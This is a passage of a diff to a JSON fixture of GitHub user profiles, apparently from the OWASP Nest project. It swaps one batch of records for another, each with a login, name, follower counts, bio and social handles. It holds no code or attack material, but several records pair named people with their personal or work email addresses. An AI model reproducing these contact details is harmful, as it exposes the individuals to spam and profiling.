"public_repositories_count": 0, - "created_at": "2022-07-21T10:54:24Z", - "updated_at": "2022-12-05T08:14:56Z", - "node_id": "U_kgDOBopq8Q", - "bio": "", + "public_repositories_count": 24, + "created_at": "2014-03-10T09:07:47Z", + "updated_at": "2024-08-25T11:25:57Z", + "node_id": "MDQ6VXNlcjY5MDUyMDA=", + "bio": "Cybersecurity engineer working at @koa-health :man_technologist:", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Flekyy90" } }, { "model": "github.user", - "pk": 2494, + "pk": 7844, "fields": { - "nest_created_at": "2024-09-12T01:28:46.712Z", - "nest_updated_at": "2024-09-16T22:28:32.060Z", + "nest_created_at": "2024-09-22T09:37:09.625Z", + "nest_updated_at": "2024-09-22T19:36:11.635Z", "name": "", - "login": "syalioune", - "email": "sy_alioune@yahoo.fr", - "avatar_url": "https://avatars.githubusercontent.com/u/6144741?v=4", + "login": "akitibala", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33974086?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2013-12-09T17:17:11Z", - "updated_at": "2024-08-05T13:50:20Z", - "node_id": "MDQ6VXNlcjYxNDQ3NDE=", + "public_repositories_count": 22, + "created_at": "2017-11-25T05:02:22Z", + "updated_at": "2024-04-20T05:49:27Z", + "node_id": "MDQ6VXNlcjMzOTc0MDg2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422603,24 +682027,24 @@ }, { "model": "github.user", - "pk": 2495, + "pk": 7845, "fields": { - "nest_created_at": "2024-09-12T01:28:50.152Z", - "nest_updated_at": "2024-09-12T01:28:50.152Z", - "name": "Jérôme Revillard", - "login": "jrevillard", + "nest_created_at": "2024-09-22T09:37:09.942Z", + "nest_updated_at": "2024-09-22T19:36:11.978Z", + "name": "", + "login": "MrBakalo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/203909?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/41620285?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 11, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 46, - "created_at": "2010-02-15T12:26:35Z", - "updated_at": "2022-10-23T21:34:41Z", - "node_id": "MDQ6VXNlcjIwMzkwOQ==", + "public_repositories_count": 2, + "created_at": "2018-07-24T09:19:18Z", + "updated_at": "2019-09-02T10:54:14Z", + "node_id": "MDQ6VXNlcjQxNjIwMjg1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422628,49 +682052,49 @@ }, { "model": "github.user", - "pk": 2496, + "pk": 7846, "fields": { - "nest_created_at": "2024-09-12T01:28:56.895Z", - "nest_updated_at": "2024-09-12T01:28:56.895Z", - "name": "lwrtw", - "login": "LtheKing", - "email": "leonalding77@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/29225810?v=4", - "company": "xxxxxx", - "location": "indonesia", + "nest_created_at": "2024-09-22T09:37:10.878Z", + "nest_updated_at": "2024-09-22T20:30:48.588Z", + "name": "corrupt", + "login": "corrupt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/365169?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2017-06-06T09:08:18Z", - "updated_at": "2024-06-18T13:39:59Z", - "node_id": "MDQ6VXNlcjI5MjI1ODEw", - "bio": "interesting in web, cloud and mobile development", + "following_count": 12, + "followers_count": 20, + "public_gists_count": 7, + "public_repositories_count": 44, + "created_at": "2010-08-15T18:19:35Z", + "updated_at": "2024-08-24T23:49:57Z", + "node_id": "MDQ6VXNlcjM2NTE2OQ==", + "bio": "How appropriate, you fight like a cow.", "is_hireable": false, - "twitter_username": "aldinata7" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2497, + "pk": 7847, "fields": { - "nest_created_at": "2024-09-12T01:28:57.715Z", - "nest_updated_at": "2024-09-12T01:28:57.715Z", - "name": "", - "login": "lauclld", + "nest_created_at": "2024-09-22T09:37:11.199Z", + "nest_updated_at": "2024-09-22T19:36:13.313Z", + "name": "Alex Croteau", + "login": "cw-alexcroteau", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/111371568?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/89528994?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 2, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-08-16T15:05:50Z", - "updated_at": "2022-08-16T15:05:50Z", - "node_id": "U_kgDOBqNlMA", + "public_repositories_count": 11, + "created_at": "2021-08-25T13:39:53Z", + "updated_at": "2024-08-13T19:51:43Z", + "node_id": "MDQ6VXNlcjg5NTI4OTk0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422678,24 +682102,24 @@ }, { "model": "github.user", - "pk": 2498, + "pk": 7848, "fields": { - "nest_created_at": "2024-09-12T01:29:00.678Z", - "nest_updated_at": "2024-09-12T01:29:00.678Z", - "name": "brian.benavidez@biotronik.com", - "login": "benavidezb", + "nest_created_at": "2024-09-22T09:37:11.852Z", + "nest_updated_at": "2024-09-22T19:36:13.950Z", + "name": "", + "login": "ed-wp", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51802042?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/88297302?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-06-13T20:36:45Z", - "updated_at": "2024-02-22T22:58:08Z", - "node_id": "MDQ6VXNlcjUxODAyMDQy", + "public_repositories_count": 4, + "created_at": "2021-08-02T01:28:13Z", + "updated_at": "2023-08-07T04:24:27Z", + "node_id": "MDQ6VXNlcjg4Mjk3MzAy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422703,49 +682127,49 @@ }, { "model": "github.user", - "pk": 2499, + "pk": 7849, "fields": { - "nest_created_at": "2024-09-12T01:29:04.456Z", - "nest_updated_at": "2024-09-13T05:09:16.763Z", - "name": "Anderson Cruz", - "login": "andersoncruz", - "email": "anderson@linux.com", - "avatar_url": "https://avatars.githubusercontent.com/u/787814?v=4", + "nest_created_at": "2024-09-22T09:37:12.532Z", + "nest_updated_at": "2024-09-22T19:36:14.582Z", + "name": "", + "login": "eric-therond-sonarsource", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56015232?v=4", "company": "", - "location": "Stuttgart, Germany", + "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2011-05-14T13:39:24Z", - "updated_at": "2022-08-29T14:07:21Z", - "node_id": "MDQ6VXNlcjc4NzgxNA==", - "bio": "FullStack Developer / Software Craftsmanship / Opensource / Trying contribute to community and make things work.", - "is_hireable": true, - "twitter_username": "andercruz" + "public_repositories_count": 6, + "created_at": "2019-10-01T05:49:19Z", + "updated_at": "2022-01-31T10:00:07Z", + "node_id": "MDQ6VXNlcjU2MDE1MjMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 2500, + "pk": 7850, "fields": { - "nest_created_at": "2024-09-12T01:29:05.707Z", - "nest_updated_at": "2024-09-12T01:29:05.707Z", + "nest_created_at": "2024-09-22T09:37:12.857Z", + "nest_updated_at": "2024-09-22T19:36:14.888Z", "name": "", - "login": "luidoc", + "login": "eu-david", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16059131?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/157360726?v=4", "company": "", - "location": "", + "location": "Everywhere", "collaborators_count": 0, - "following_count": 0, + "following_count": 3, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2015-11-28T13:55:11Z", - "updated_at": "2024-09-11T09:55:41Z", - "node_id": "MDQ6VXNlcjE2MDU5MTMx", + "public_repositories_count": 1, + "created_at": "2024-01-22T09:36:57Z", + "updated_at": "2024-08-24T17:07:14Z", + "node_id": "U_kgDOCWEiVg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422753,49 +682177,49 @@ }, { "model": "github.user", - "pk": 2501, + "pk": 7851, "fields": { - "nest_created_at": "2024-09-12T01:29:08.435Z", - "nest_updated_at": "2024-09-12T01:29:08.435Z", - "name": "Ken Poppleton", - "login": "kpopple", + "nest_created_at": "2024-09-22T09:37:13.194Z", + "nest_updated_at": "2024-09-22T19:36:15.231Z", + "name": "Vladyslav Novotnyi", + "login": "fabelx", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13275765?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/38182176?v=4", "company": "", - "location": "Salt Lake City, Utah, USA", + "location": "Canada", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-07-10T14:51:30Z", - "updated_at": "2024-01-11T13:18:35Z", - "node_id": "MDQ6VXNlcjEzMjc1NzY1", - "bio": "", + "following_count": 6, + "followers_count": 2, + "public_gists_count": 3, + "public_repositories_count": 5, + "created_at": "2018-04-08T12:04:23Z", + "updated_at": "2024-04-02T17:45:34Z", + "node_id": "MDQ6VXNlcjM4MTgyMTc2", + "bio": "💙💛", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2502, + "pk": 7852, "fields": { - "nest_created_at": "2024-09-12T01:29:12.699Z", - "nest_updated_at": "2024-09-12T02:07:23.354Z", + "nest_created_at": "2024-09-22T09:37:13.515Z", + "nest_updated_at": "2024-09-22T19:38:23.086Z", "name": "", - "login": "AfshinOnline", + "login": "fb33", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16746699?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8268469?v=4", + "company": "Lectra", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 16, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2016-01-17T18:00:17Z", - "updated_at": "2024-08-21T11:28:24Z", - "node_id": "MDQ6VXNlcjE2NzQ2Njk5", + "public_repositories_count": 18, + "created_at": "2014-07-25T14:50:01Z", + "updated_at": "2024-06-14T10:26:45Z", + "node_id": "MDQ6VXNlcjgyNjg0Njk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422803,24 +682227,24 @@ }, { "model": "github.user", - "pk": 2503, + "pk": 7853, "fields": { - "nest_created_at": "2024-09-12T01:29:14.400Z", - "nest_updated_at": "2024-09-12T01:29:14.400Z", + "nest_created_at": "2024-09-22T09:37:13.834Z", + "nest_updated_at": "2024-09-22T19:36:15.862Z", "name": "", - "login": "gray380", + "login": "felipemgurian", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36230373?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26802527?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 13, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-02-07T12:04:09Z", - "updated_at": "2024-06-12T14:44:03Z", - "node_id": "MDQ6VXNlcjM2MjMwMzcz", + "public_repositories_count": 4, + "created_at": "2017-03-30T20:34:50Z", + "updated_at": "2024-04-19T14:41:01Z", + "node_id": "MDQ6VXNlcjI2ODAyNTI3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422828,24 +682252,49 @@ }, { "model": "github.user", - "pk": 2504, + "pk": 7854, "fields": { - "nest_created_at": "2024-09-12T01:29:22.785Z", - "nest_updated_at": "2024-09-12T01:31:24.106Z", - "name": "", - "login": "sprathod369", + "nest_created_at": "2024-09-22T09:37:14.148Z", + "nest_updated_at": "2024-09-22T19:36:16.180Z", + "name": "Falk", + "login": "flkhndlr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73107830?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/50197097?v=4", + "company": "@telekom-mms", + "location": "Dresden", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2019-05-02T08:29:48Z", + "updated_at": "2024-09-17T05:46:12Z", + "node_id": "MDQ6VXNlcjUwMTk3MDk3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7855, + "fields": { + "nest_created_at": "2024-09-22T09:37:14.471Z", + "nest_updated_at": "2024-09-22T19:36:16.490Z", + "name": "h00die", + "login": "h00die", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/752491?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2020-10-19T10:04:27Z", - "updated_at": "2024-09-06T08:30:48Z", - "node_id": "MDQ6VXNlcjczMTA3ODMw", + "following_count": 10, + "followers_count": 167, + "public_gists_count": 3, + "public_repositories_count": 27, + "created_at": "2011-04-26T13:48:09Z", + "updated_at": "2024-09-19T10:13:39Z", + "node_id": "MDQ6VXNlcjc1MjQ5MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422853,49 +682302,49 @@ }, { "model": "github.user", - "pk": 2505, + "pk": 7856, "fields": { - "nest_created_at": "2024-09-12T01:29:25.734Z", - "nest_updated_at": "2024-09-12T01:37:22.203Z", + "nest_created_at": "2024-09-22T09:37:15.110Z", + "nest_updated_at": "2024-09-22T19:36:17.115Z", "name": "", - "login": "mulder999", + "login": "igorgomeszup", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1905023?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/70586622?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2012-06-29T06:31:36Z", - "updated_at": "2024-07-13T12:02:40Z", - "node_id": "MDQ6VXNlcjE5MDUwMjM=", - "bio": "Software architect programming since 1984", + "public_repositories_count": 4, + "created_at": "2020-09-01T13:47:21Z", + "updated_at": "2023-04-10T17:49:08Z", + "node_id": "MDQ6VXNlcjcwNTg2NjIy", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2506, + "pk": 7857, "fields": { - "nest_created_at": "2024-09-12T01:29:29.657Z", - "nest_updated_at": "2024-09-12T01:29:29.657Z", - "name": "Wolfgang Reinhardt", - "login": "wollepb", + "nest_created_at": "2024-09-22T09:37:15.421Z", + "nest_updated_at": "2024-09-22T19:36:17.436Z", + "name": "", + "login": "ikrenyi1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/435426?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7345252?v=4", "company": "", - "location": "Paderborn, Germany", + "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 5, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2010-10-11T14:05:14Z", - "updated_at": "2020-04-17T08:25:49Z", - "node_id": "MDQ6VXNlcjQzNTQyNg==", + "public_repositories_count": 16, + "created_at": "2014-04-19T08:39:24Z", + "updated_at": "2024-02-21T04:25:34Z", + "node_id": "MDQ6VXNlcjczNDUyNTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422903,24 +682352,24 @@ }, { "model": "github.user", - "pk": 2507, + "pk": 7858, "fields": { - "nest_created_at": "2024-09-12T01:29:35.113Z", - "nest_updated_at": "2024-09-12T01:29:35.113Z", - "name": "Thomas Fuerer", - "login": "tofuatjava", + "nest_created_at": "2024-09-22T09:37:16.415Z", + "nest_updated_at": "2024-09-22T19:36:18.407Z", + "name": "Serhii Vasyliev", + "login": "s2504s", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3055352?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1134449?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 3, "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2012-12-16T11:52:04Z", - "updated_at": "2024-07-16T16:25:38Z", - "node_id": "MDQ6VXNlcjMwNTUzNTI=", + "public_gists_count": 42, + "public_repositories_count": 53, + "created_at": "2011-10-17T22:46:22Z", + "updated_at": "2024-09-05T20:49:37Z", + "node_id": "MDQ6VXNlcjExMzQ0NDk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422928,24 +682377,24 @@ }, { "model": "github.user", - "pk": 2508, + "pk": 7859, "fields": { - "nest_created_at": "2024-09-12T01:29:38.095Z", - "nest_updated_at": "2024-09-12T01:29:38.095Z", - "name": "", - "login": "itxavdimet", + "nest_created_at": "2024-09-22T09:37:16.731Z", + "nest_updated_at": "2024-09-22T19:36:18.717Z", + "name": "Stefan van der Meer", + "login": "svdm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/114754839?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/600464?v=4", + "company": "@PrivacyCompany ", + "location": "NL", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-09-30T14:19:12Z", - "updated_at": "2022-12-01T08:03:37Z", - "node_id": "U_kgDOBtcFFw", + "public_repositories_count": 14, + "created_at": "2011-02-04T13:45:48Z", + "updated_at": "2024-08-27T11:22:26Z", + "node_id": "MDQ6VXNlcjYwMDQ2NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422953,99 +682402,124 @@ }, { "model": "github.user", - "pk": 2509, + "pk": 7860, "fields": { - "nest_created_at": "2024-09-12T01:29:43.950Z", - "nest_updated_at": "2024-09-12T02:14:25.622Z", - "name": "Sahiba Mittal", - "login": "sahibamittal", - "email": "sahiba.mittal@citi.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5709882?v=4", - "company": "Citi", - "location": "Dublin, Ireland", + "nest_created_at": "2024-09-22T09:37:17.086Z", + "nest_updated_at": "2024-09-22T19:36:19.042Z", + "name": "S Bani", + "login": "sbani", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3541652?v=4", + "company": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 7, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2013-10-17T13:37:24Z", - "updated_at": "2024-03-06T17:41:37Z", - "node_id": "MDQ6VXNlcjU3MDk4ODI=", - "bio": "DevSecOps engineer in Cloud Security at Citi.", + "following_count": 28, + "followers_count": 26, + "public_gists_count": 6, + "public_repositories_count": 18, + "created_at": "2013-02-12T12:49:10Z", + "updated_at": "2024-08-06T07:19:39Z", + "node_id": "MDQ6VXNlcjM1NDE2NTI=", + "bio": "Security Engineer & Penetration Tester", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2510, + "pk": 7861, "fields": { - "nest_created_at": "2024-09-12T01:29:47.290Z", - "nest_updated_at": "2024-09-12T01:29:47.290Z", - "name": "Goncalo Vieira", - "login": "gjfvieira", + "nest_created_at": "2024-09-22T09:37:17.745Z", + "nest_updated_at": "2024-09-22T19:36:19.671Z", + "name": "Sébastien Prud'homme", + "login": "sebastien-prudhomme", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47488771?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/641962?v=4", "company": "", - "location": "Portugal", + "location": "Toulouse, France", "collaborators_count": 0, - "following_count": 10, - "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 7, - "created_at": "2019-02-10T00:37:36Z", - "updated_at": "2024-05-10T11:44:41Z", - "node_id": "MDQ6VXNlcjQ3NDg4Nzcx", + "following_count": 0, + "followers_count": 7, + "public_gists_count": 19, + "public_repositories_count": 41, + "created_at": "2011-02-28T08:03:04Z", + "updated_at": "2024-09-04T16:58:26Z", + "node_id": "MDQ6VXNlcjY0MTk2Mg==", "bio": "", "is_hireable": false, - "twitter_username": "GJFVieira" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2511, + "pk": 7862, "fields": { - "nest_created_at": "2024-09-12T01:30:02.472Z", - "nest_updated_at": "2024-09-12T01:30:02.472Z", - "name": "Julian Löffler", - "login": "Breee", - "email": "julian@corewire.de", - "avatar_url": "https://avatars.githubusercontent.com/u/11966385?v=4", - "company": "", + "nest_created_at": "2024-09-22T09:37:18.119Z", + "nest_updated_at": "2024-09-22T19:36:19.981Z", + "name": "T R Nayan", + "login": "trnayan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40191905?v=4", + "company": "BugsBD Limited", + "location": "Dhaka , Bangladesh", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2018-06-12T04:31:22Z", + "updated_at": "2024-05-04T11:37:09Z", + "node_id": "MDQ6VXNlcjQwMTkxOTA1", + "bio": "", + "is_hireable": false, + "twitter_username": "tr_nayan" + } +}, +{ + "model": "github.user", + "pk": 7863, + "fields": { + "nest_created_at": "2024-09-22T09:37:18.435Z", + "nest_updated_at": "2024-09-22T19:36:20.301Z", + "name": "", + "login": "TarlogicSecurity", + "email": "andres.tarasco@tarlogic.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6975054?v=4", + "company": "Tarlogic", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 6, + "following_count": 0, + "followers_count": 476, "public_gists_count": 2, - "public_repositories_count": 54, - "created_at": "2015-04-15T18:04:22Z", - "updated_at": "2024-09-03T14:55:22Z", - "node_id": "MDQ6VXNlcjExOTY2Mzg1", - "bio": "I love to build stuff and automate things.\r\n\r\nCTO @corewire, K8S guy @Haufe-Group", + "public_repositories_count": 22, + "created_at": "2014-03-17T13:01:27Z", + "updated_at": "2024-06-26T07:56:38Z", + "node_id": "MDQ6VXNlcjY5NzUwNTQ=", + "bio": "Cyber security, cyber intelligence, Red Team", "is_hireable": false, - "twitter_username": "" + "twitter_username": "tarlogic" } }, { "model": "github.user", - "pk": 2512, + "pk": 7864, "fields": { - "nest_created_at": "2024-09-12T01:30:04.669Z", - "nest_updated_at": "2024-09-12T01:30:04.669Z", - "name": "", - "login": "lsoumille", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9105500?v=4", + "nest_created_at": "2024-09-22T09:37:18.758Z", + "nest_updated_at": "2024-09-22T19:36:20.618Z", + "name": "Terry Chia", + "login": "Ayrx", + "email": "terry@ayrx.me", + "avatar_url": "https://avatars.githubusercontent.com/u/1937160?v=4", "company": "", - "location": "Aix en Provence, France", + "location": "Singapore", "collaborators_count": 0, - "following_count": 8, - "followers_count": 7, - "public_gists_count": 6, + "following_count": 3, + "followers_count": 210, + "public_gists_count": 22, "public_repositories_count": 70, - "created_at": "2014-10-09T08:06:26Z", - "updated_at": "2024-05-31T08:44:26Z", - "node_id": "MDQ6VXNlcjkxMDU1MDA=", + "created_at": "2012-07-08T01:40:06Z", + "updated_at": "2024-08-30T07:51:29Z", + "node_id": "MDQ6VXNlcjE5MzcxNjA=", "bio": "", "is_hireable": true, "twitter_username": "" @@ -423053,24 +682527,49 @@ }, { "model": "github.user", - "pk": 2513, + "pk": 7865, "fields": { - "nest_created_at": "2024-09-12T01:30:06.759Z", - "nest_updated_at": "2024-09-12T01:30:06.759Z", - "name": "", - "login": "dkeason", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/21960599?v=4", + "nest_created_at": "2024-09-22T09:37:19.073Z", + "nest_updated_at": "2024-09-22T19:36:20.933Z", + "name": "Thom Dixon", + "login": "thomdixon", + "email": "thom@thomdixon.org", + "avatar_url": "https://avatars.githubusercontent.com/u/461514?v=4", "company": "", - "location": "", + "location": "Greater Seattle Area, WA", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 47, + "public_gists_count": 5, + "public_repositories_count": 45, + "created_at": "2010-10-31T09:51:55Z", + "updated_at": "2023-12-27T01:59:01Z", + "node_id": "MDQ6VXNlcjQ2MTUxNA==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7866, + "fields": { + "nest_created_at": "2024-09-22T09:37:20.337Z", + "nest_updated_at": "2024-09-22T19:36:22.201Z", + "name": "Tinus Mørch Abell", + "login": "tmablunar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110815939?v=4", + "company": "Lunar", + "location": "Aarhus", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-09-02T19:50:26Z", - "updated_at": "2024-04-25T20:38:13Z", - "node_id": "MDQ6VXNlcjIxOTYwNTk5", + "public_repositories_count": 1, + "created_at": "2022-08-08T08:37:22Z", + "updated_at": "2024-09-18T06:30:53Z", + "node_id": "U_kgDOBprqww", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423078,49 +682577,74 @@ }, { "model": "github.user", - "pk": 2514, + "pk": 7867, "fields": { - "nest_created_at": "2024-09-12T01:30:14.827Z", - "nest_updated_at": "2024-09-12T01:30:14.827Z", - "name": "Patryk Krajnik", - "login": "pattkrajnik", + "nest_created_at": "2024-09-22T09:37:20.653Z", + "nest_updated_at": "2024-09-22T19:36:22.511Z", + "name": "Travis Smith", + "login": "tks98", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103078774?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/70284059?v=4", "company": "", - "location": "", + "location": "Chicago", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 28, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2020-08-26T16:57:29Z", + "updated_at": "2024-09-17T03:24:39Z", + "node_id": "MDQ6VXNlcjcwMjg0MDU5", + "bio": "DevSecOps Engineering Manager & Professor", + "is_hireable": false, + "twitter_username": "_tks98" + } +}, +{ + "model": "github.user", + "pk": 7868, + "fields": { + "nest_created_at": "2024-09-22T09:37:20.967Z", + "nest_updated_at": "2024-09-22T19:38:24.056Z", + "name": "Unsuspecting user", + "login": "kibernautas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49907666?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2022-04-05T22:39:46Z", - "updated_at": "2024-08-29T08:18:42Z", - "node_id": "U_kgDOBiTbdg", - "bio": "", + "public_repositories_count": 0, + "created_at": "2019-04-23T11:50:22Z", + "updated_at": "2024-07-11T07:22:47Z", + "node_id": "MDQ6VXNlcjQ5OTA3NjY2", + "bio": "I like breaking things", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2515, + "pk": 7869, "fields": { - "nest_created_at": "2024-09-12T01:30:16.486Z", - "nest_updated_at": "2024-09-12T01:30:16.486Z", - "name": "", - "login": "WeissFabian", + "nest_created_at": "2024-09-22T09:37:21.285Z", + "nest_updated_at": "2024-09-22T19:36:23.168Z", + "name": "Vijay Bheemineni", + "login": "code4innerpeace", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50834586?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20666896?v=4", "company": "", - "location": "", + "location": "Austin, TX", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2019-05-20T13:34:32Z", - "updated_at": "2024-09-02T11:54:46Z", - "node_id": "MDQ6VXNlcjUwODM0NTg2", + "public_repositories_count": 28, + "created_at": "2016-07-26T16:42:49Z", + "updated_at": "2020-06-20T17:35:35Z", + "node_id": "MDQ6VXNlcjIwNjY2ODk2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423128,24 +682652,24 @@ }, { "model": "github.user", - "pk": 2516, + "pk": 7870, "fields": { - "nest_created_at": "2024-09-12T01:30:18.177Z", - "nest_updated_at": "2024-09-16T22:28:31.060Z", + "nest_created_at": "2024-09-22T09:37:21.603Z", + "nest_updated_at": "2024-09-22T19:36:23.476Z", "name": "", - "login": "AndreiTrW", + "login": "W0uldYk1ndlY", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/82941615?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/86364646?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2021-04-21T09:57:54Z", - "updated_at": "2023-12-06T11:05:19Z", - "node_id": "MDQ6VXNlcjgyOTQxNjE1", + "public_repositories_count": 2, + "created_at": "2021-06-23T14:17:55Z", + "updated_at": "2021-06-23T14:17:56Z", + "node_id": "MDQ6VXNlcjg2MzY0NjQ2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423153,49 +682677,49 @@ }, { "model": "github.user", - "pk": 2517, + "pk": 7871, "fields": { - "nest_created_at": "2024-09-12T01:30:20.351Z", - "nest_updated_at": "2024-09-12T01:30:20.351Z", - "name": "Mehrdad", - "login": "mehrdad2000", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26499665?v=4", + "nest_created_at": "2024-09-22T09:37:21.915Z", + "nest_updated_at": "2024-09-22T19:36:23.796Z", + "name": "Watchanon Numnam", + "login": "jiramot", + "email": "jiramot@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/307154?v=4", "company": "", - "location": "", + "location": "Thailand", "collaborators_count": 0, - "following_count": 754, - "followers_count": 114, - "public_gists_count": 2, - "public_repositories_count": 31, - "created_at": "2017-03-18T07:38:05Z", - "updated_at": "2024-08-19T10:23:30Z", - "node_id": 